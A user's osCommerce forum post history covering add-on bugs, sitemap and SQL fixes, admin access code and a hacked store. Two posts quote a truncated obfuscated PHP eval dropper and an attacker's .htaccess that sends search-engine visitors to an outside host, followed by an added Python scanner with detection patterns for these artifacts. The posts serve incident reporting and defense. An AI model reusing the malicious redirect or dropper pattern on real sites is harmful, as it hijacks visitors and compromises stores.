
osCommerce

The e-commerce.

mr_absinthe

Pioneers
  • Posts

    494

Everything posted by mr_absinthe

  1. I tested on various links with various statuses. Tested in FF as well as IE and Chrome. It appears that it only works on some links - I have not been able to figure out when and why. For example I've selected three links with status Approved and changed them in IE to Disabled. Only two of them were changed. The link that did not change is unchangeable - tested all browsers and all statuses - remains Approved. Another link has status Disabled and in IE did not change to Approved nor changed to Pending in FF - nor was I able to delete it in Chrome. I hope that helps.
  2. Real, Absinth, Thujone, originalabsinthe, www.originalabsinthe.com and that might explain it... I took out Real and it works now. Somehow I forgot that I've put more phrases there. The second noticed problem is with the page Links Status - I am now unable to change the status using the buttons located at the bottom of the page (Pending, Approved, Disabled, etc.) It does nothing. I've loaded the admin/includes/functions/links.php file from the previous version (1.28) to test it and it works fine. Any ideas?
  3. Hi Jack, thank you for keeping it updated. I might be doing something wrong or I just don't get it... perhaps you could clarify it for me. I have a pending link submission and as you can see from this image, my link should be located on their web site: When I check the link, it is found: And the Links Status page clearly shows that everything is OK and my link is there: I have not been able to find the link there no matter how hard I try, can you see it there somewhere? If not, why is the script returning positive result?
  4. Thank you Nic, maybe I was going too quick through the install file... It is clear now :thumbsup:
  5. If I understand correctly (when I look into robots.txt), we should create folder /admin/ and copy the index.php from personal folder there, right? But that would mean that two "banned" emails will be received - at least that is what is happening right now. And if I don't keep the index.php file in admin folder, nobody is trapped while trying to access it.
  6. Jack, are you sure that the newly posted link is correct? I believe that you wanted to mention this one instead: http://addons.oscommerce.com/info/6583
  7. Thank you, those fixes have been applied BEFORE the attack.
  8. They've uploaded .php files to writable directories only. File manager does not exist there and admin was also renamed. Not sure what patch in application_top you mean, could you point me please?
  9. Jack, just wanted to say THANKS! I've installed the SiteMonitor on a friend's site and it discovered hacker files recently! They've uploaded several files to all writable directories of the web site. It seems that files have identical content and various filenames such as spill.php, spool.php or sql.php. This is a small preview of those files:

         <? eval(gzinflate(base64_decode('DZfHDsTGEUR/xTdJ4IE5wZYFcplzWqaLwZxz5td7D32c6cGg6nX1P//9zz//Ks6k/7N6m7Hsk734M022gsD+lxfZlBd//sHFBbptAZN9DfCOkS7KBD2csD3B6/cdLurl+rFc4fJ0A4YBbhA8818ZJR5/TZB4wHxZRPrTgkPik27AgT7u4aHigaBc2AKjQjPqHcddIBNTflVwsk2pp9LyFS9gGVHI8aNw1G/2SapZF6qaUqu14drNMKrjEGXi3KZgERz+/CachCmy5fu6LnTT8qnvdnZr/OJR/ZGcJH6PPJRVn/Lqpph4bjI70sbJWuZJYFcLr5iDoN9IMSDwAVKL3qh2z2hsSxeVYuywg/weFvlFGp16ItXYntOIHOyIDc2RgFZyDKJUfU8ZDSu86FUYRX7T/KFdm73bC7LWl5alFhS8Pgq3FEBkGwrnaQqmeE014izZSQ0pLx6U5KkpyXEN9Q4R... etc. etc.

     Thanks to SiteMonitor, we've noticed quite quickly and deleted those files and added .htaccess with this code:

         php_flag engine off
         <Files ~ "\.(php*|s?p?html|cgi|pl|ini)$">
         deny from all
         </Files>

     We've also changed CHMOD to 757 because 775 was throwing errors. A few minutes after changing the permissions, I've noticed that new .htaccess files were uploaded to all of those directories so I've deleted them. Setting permissions to 757 is obviously no solution and I have also changed the ftp password - however there was no hacker trace in the ftp log. Would you have a solution how to avoid the above please? Is there a possibility of protecting writable directories? As far as I can tell, files have been patched and many security contributions are in place.
  10. And for those facing the same warning... Just make sure that the directory data (/includes/modules/kiss_filesafe/data) is writable. P.S. The correct answer was just two words longer, that should not hurt Rob! Have you ever not overlooked something by yourself?
  11. After browsing to filesafe.php these errors appeared:

          Warning: Kiss_FileSafe_Abstract::moduleAccess cannot write to the module directory [PATH]includes/modules/kiss_filesafe/data, this will have to be done manually in /home/xxx/public_html/includes/modules/kiss_filesafe/classes/kiss_filesafe_abstract.php on line 186

          Warning: file_put_contents(/home/xxx/public_html/includes/modules/kiss_filesafe/data/files_data.txt) [function.file-put-contents]: failed to open stream: Permission denied in /home/xxx/public_html/includes/modules/kiss_filesafe/classes/kiss_filesafe_abstract.php on line 251

          Warning: file_put_contents(/home/xxx/public_html/includes/modules/kiss_filesafe/data/runtime.txt) [function.file-put-contents]: failed to open stream: Permission denied in /home/xxx/public_html/includes/modules/kiss_filesafe/classes/kiss_filesafe_abstract.php on line 256

      Any idea please?
  12. Thank you for another great contribution, I'm just about to install it on friend's web site. May I ask what is the difference between this and SiteMonitor? Also, since you've mentioned extra protection for writable directories, maybe you would have a solution to the following problem: Friend's site was hacked... they've uploaded several files to all writable directories of the web site. It seems that files have identical content and various filenames such as spill.php, spool.php or sql.php. This is a small preview of those files:

          <? eval(gzinflate(base64_decode('DZfHDsTGEUR/xTdJ4IE5wZYFcplzWqaLwZxz5td7D32c6cGg6nX1P//9zz//Ks6k/7N6m7Hsk734M022gsD+lxfZlBd//sHFBbptAZN9DfCOkS7KBD2csD3B6/cdLurl+rFc4fJ0A4YBbhA8818ZJR5/TZB4wHxZRPrTgkPik27AgT7u4aHigaBc2AKjQjPqHcddIBNTflVwsk2pp9LyFS9gGVHI8aNw1G/2SapZF6qaUqu14drNMKrjEGXi3KZgERz+/CachCmy5fu6LnTT8qnvdnZr/OJR/ZGcJH6PPJRVn/Lqpph4bjI70sbJWuZJYFcLr5iDoN9IMSDwAVKL3qh2z2hsSxeVYuywg/weFvlFGp16ItXYntOIHOyIDc2RgFZyDKJUfU8ZDSu86FUYRX7T/KFdm73bC7LWl5alFhS8Pgq3FEBkGwrnaQqmeE014izZSQ0pLx6U5KkpyXEN9Q4R... etc. etc.

      We've noticed quite quickly and deleted those files and added .htaccess as per your instructions. We've also changed CHMOD to 757 because 775 was throwing errors. A few minutes after changing the permissions, I've noticed that new .htaccess files were uploaded to all of those directories so I've deleted them. Setting permissions to 757 is obviously no solution and I have also changed the ftp password - however there was no hacker trace in the ftp log.

      Their .htaccess was:

          RewriteEngine On
          RewriteCond %{HTTP_REFERER} .*google.* [OR]
          RewriteCond %{HTTP_REFERER} .*ask.* [OR]
          RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
          RewriteCond %{HTTP_REFERER} .*excite.* [OR]
          RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
          RewriteCond %{HTTP_REFERER} .*msn.* [OR]
          RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
          RewriteCond %{HTTP_REFERER} .*aol.* [OR]
          RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
          RewriteCond %{HTTP_REFERER} .*goto.* [OR]
          RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
          RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
          RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
          RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
          RewriteCond %{HTTP_REFERER} .*search.* [OR]
          RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
          RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
          RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
          RewriteCond %{HTTP_REFERER} .*mail.* [OR]
          RewriteCond %{HTTP_REFERER} .*dogpile.*
          RewriteRule ^(.*)$ http://lincau.osa.pl/se/ [R=301,L]
          ErrorDocument 401 http://lincau.osa.pl/se/
          ErrorDocument 403 http://lincau.osa.pl/se/
          ErrorDocument 404 http://lincau.osa.pl/se/
          ErrorDocument 500 http://lincau.osa.pl/se/

      Would you have a solution to the above please? As far as I can tell, files have been patched and many security contributions are in place.
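
A scanner for the artifacts described in the post above: PHP files wrapping `eval(gzinflate(base64_decode(`, an .htaccess that sends visitors to an off-site host (optionally gated on the referer), and world-writable directories such as those left by chmod 757. This is an added example, not part of the forum posts and not code from SiteMonitor or FileSafe; the function names, finding labels, the host `redirect.example` and the sample files are constructed for illustration.

```python
import os
import re
import tempfile

# Patterns: the eval wrapper quoted in the post, absolute-URL redirect targets, referer conditions.
DROPPER = re.compile(r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(", re.I)
REDIRECT = re.compile(r"^\s*(?:RewriteRule|ErrorDocument)\s.*?https?://([^/\s\"]+)", re.I | re.M)
REFERER = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}", re.I | re.M)

def check_htaccess(text, own_hosts):
    """Return the off-site hosts an .htaccess body sends visitors to."""
    hosts = {h.lower() for h in REDIRECT.findall(text)}
    return sorted(hosts - {h.lower() for h in own_hosts})

def scan(root, own_hosts):
    """Walk root and return (kind, path relative to root) findings."""
    findings = []
    for folder, _dirs, files in os.walk(root):
        if os.stat(folder).st_mode & 0o002:  # "other" write bit, set by chmod 757 or 777
            findings.append(("world-writable-dir", os.path.relpath(folder, root)))
        for name in files:
            path = os.path.join(folder, name)
            try:
                with open(path, "r", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
            if re.search(r"\.(php\d?|phtml)$", name, re.I) and DROPPER.search(text):
                findings.append(("php-eval-dropper", os.path.relpath(path, root)))
            elif name == ".htaccess" and check_htaccess(text, own_hosts):
                gated = "referer-gated" if REFERER.search(text) else "offsite"
                findings.append(("htaccess-%s-redirect" % gated, os.path.relpath(path, root)))
    return findings

def demo():
    """Scan a constructed sample tree; host names and file bodies are made up."""
    with tempfile.TemporaryDirectory() as root:
        images = os.path.join(root, "images")
        os.mkdir(images)
        os.chmod(images, 0o757)
        samples = {
            "spill.php": "<? eval(gzinflate(base64_decode('QUJD')));",
            "ok.php": "<?php echo 'hello';",
            ".htaccess": "RewriteCond %{HTTP_REFERER} .*google.*\n"
                         "RewriteRule ^(.*)$ http://redirect.example/se/ [R=301,L]\n",
        }
        for name, body in samples.items():
            with open(os.path.join(images, name), "w") as fh:
                fh.write(body)
        return sorted(scan(root, ["www.yourstore.com"]))
```

Pass the store's own host names as `own_hosts` so that legitimate `ErrorDocument` or `RewriteRule` targets on the same site are not reported.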
  13. OK, no problem. As always, please feel free to let me know if you want me to test it.
  14. OK, the following did not work -

          You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1 order by m.manufacturers_name DESC LIMIT 0, 30' at line 1

          SELECT m.manufacturers_id as mID, m.date_added, m.last_modified as last_mod, m.manufacturers_name
          FROM manufacturers m
          left join manufacturers_info mi on m.manufacturers_id = mi.manufacturers_id
          where mi.languages_id 1
          order by m.manufacturers_name DESC;

      so I changed it to this (where mi.languages_id = 1) and it worked just fine -

          Showing rows 0 - 3 (4 total, Query took 0.0006 sec)

          SELECT m.manufacturers_id as mID, m.date_added, m.last_modified as last_mod, m.manufacturers_name
          FROM manufacturers m
          left join manufacturers_info mi on m.manufacturers_id = mi.manufacturers_id
          where mi.languages_id = 1
          order by m.manufacturers_name DESC;

      So, what does it tell us?
  15. It is still failing I'm afraid...

          ERROR: Google Manufacturers Sitemap Generation FAILED!

      this is the code:

          function GenerateManufacturerSitemap($languages_id){
            $sql = "SELECT m.manufacturers_id as mID, m.date_added, m.last_modified as last_mod, m.manufacturers_name FROM " . TABLE_MANUFACTURERS . " m left join " . TABLE_MANUFACTURERS_INFO . " mi on m.manufacturers_id = mi.manufacturers_id where mi.languages_id = " . (int)$language_id . " order by m.manufacturers_name DESC";
  16. It appears that it is failing... ERROR: Google Manufacturers Sitemap Generation FAILED! and: [MANUFACTURERS] => Array ( [sTATUS] => success [NUM_ROWS] => 0 ) I have uploaded an empty sitemapmanufacturers.xml file to a server before testing. All other sitemaps created successfully.
  17. Jack, could you please provide the change for the manufacturers sql query in googlesitemap/sitemap.class.php?
  18. Hi Jack, support thread in admin (language file) shows: http://www.oscommerce.com/forums/topic/351109-compare-my-price/. I'll test and let you know more later.
  19. Thank you very much, that works just fine on both sitemapcategories.xml and sitemapspecials.xml. I see no problem on the products section and I'm not using manufacturers.
  20. That works fine on sitemapspecials.xml however no change on sitemapcategories.xml, still 32 links like:

          http://www.originalabsinthe.com/accessories-c-23.html
          http://www.originalabsinthe.com/accessories-c-23.html
          http://www.originalabsinthe.com/accessories-c-23.html
          http://www.originalabsinthe.com/accessories-c-23.html
          http://www.originalabsinthe.com/special-offers-c-24.html
          http://www.originalabsinthe.com/special-offers-c-24.html
          http://www.originalabsinthe.com/special-offers-c-24.html
          http://www.originalabsinthe.com/special-offers-c-24.html
          http://www.originalabsinthe.com/gift-vouchers-c-27.html
          http://www.originalabsinthe.com/gift-vouchers-c-27.html
          http://www.originalabsinthe.com/gift-vouchers-c-27.html
          http://www.originalabsinthe.com/gift-vouchers-c-27.html
  21. Hi Jack, Thanks for the update, I'm running the latest version, four languages. Problem with multiple language links on sitemapspecials sorted, however same problem is now on categories: sitemapcategories.xml I have total of 8 categories, however sitemapcategories.xml shows four identical (all English language) links for each category, 32 links in total. Looks like sitemap.class.php needs a little change around function GenerateCategorySitemap.
  22. Hi Jack, did you have a chance to have a look at the above issue please?
  23. I'm running version 2.5 in my two stores on two different servers and after a lot of testing, it appears that this version is stable with no major bugs - I therefore suggest updating SiteMonitor to the latest version - it only takes a few minutes anyway.
  24. I can see that quite a few people were having a similar problem, $PHP_AUTH_USER and _SERVER[REMOTE_USER] didn't work. It was the same for me, I have therefore replaced it with _SERVER[REDIRECT_REMOTE_USER]. Also, on some servers, you cannot use DIR_WS_ADMIN, don't ask me why. You will have to keep the file name only. To give you an example, the whole, working piece of code would look like this:

          if ($_SERVER['REDIRECT_REMOTE_USER'] == 'user1') {
            // user1 keeps full access to the admin
          } else {
            // every other user may only open the pages listed here
            if ( ($PHP_SELF != "orders.php") && ($PHP_SELF != "index.php") && ($PHP_SELF != "invoice.php") && ($PHP_SELF != "server_info.php") ) {
              die("<br /><br /><br /><br /><center><b>You are not currently authorized to view this page.</b><br /><br />Please contact the store administrator for details. To return, click back on your browser.<br /><br /><br /><br />\n\n <i>If you do need access to a specific page please contact the site administrator and quote the below page name.</i><br><br>Page name: $PHP_SELF</center>");
            }
          }

      And last but not least, you may need to add index.php in your list of permitted files, otherwise you would need to enter the permitted page via direct link - https://www.yourstore.com/admin/orders.php for example. I hope that helps.